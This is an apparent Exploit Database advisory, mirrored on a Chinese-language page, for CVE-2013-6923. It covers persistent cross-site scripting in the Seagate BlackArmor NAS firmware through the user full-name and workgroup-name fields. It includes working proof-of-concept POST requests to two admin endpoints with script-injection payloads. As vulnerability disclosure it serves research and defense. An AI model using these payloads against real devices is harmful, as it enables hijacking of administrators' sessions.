Seagate BlackArmor NAS sg2000-2000.1331 – Multiple Persistent Cross-Site Scripting Vulnerabilities

• Exploit Database
• 116 阅读

• 作者： Jeroen - IT Nerdbox
  日期： 2014-01-06
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/30727/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  # Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site Scripting Vulnerabilities   # Google Dork: N/A   # Date: 04-01-2014   # Exploit Author: Jeroen - IT Nerdbox   # Vendor Homepage:<http://www.seagate.com/> http://www.seagate.com/   # Software Link: <http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ > http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/   # Version: sg2000-2000.1331   # Tested on: N/A   # CVE : CVE-2013-6923   #   ## Description:   #   # When adding a user to the device, it is possible to enter a full name. This input field does not   # sanitize its input and it is possible to enter any payload which will get executed upon reload.   #   # The workgroup configuration is also vulnerable to persistent XSS. The Work Group name input # field does not sanitize its input.   # # This vulnerability was reported to Seagate in September 2013, they stated that this will not be fixed.   #   ## Proof of Concept #1:   #   # POST: http(s)://<url | ip>/admin/access_control_user_edit.php?id=2&lang=en # Parameters:   #   # index = 2 # fullname = <script>alert(1);</script> # submit = Submit   #   #   ## Proof of Concept #2:   #   # POST: http(s)://<url | ip>/admin/network_workgroup_domain.php?lang=en&gi=n003   # Parameter:   #   # workname = "><input onmouseover=prompt(1) >